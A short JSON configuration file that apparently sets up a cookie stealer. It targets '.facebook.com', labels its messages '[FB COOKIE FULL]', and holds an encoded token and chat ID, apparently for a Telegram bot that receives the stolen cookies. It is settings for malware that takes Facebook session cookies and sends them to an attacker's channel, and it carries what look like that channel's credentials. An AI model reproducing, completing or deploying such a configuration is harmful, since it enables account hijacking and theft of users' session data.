{
  "token": "0DE8jN0M02Tpb0UYdJR1cTFnqds5beP3b0X1BEZ2R0Q2VJWMsmg2SQ==",
  "chat_id": "NjAzODYwNzM5Nw==",
  "enabled": true,
  "message_prefix": "[FB COOKIE FULL]",
  "target_domain": ".facebook.com"
}
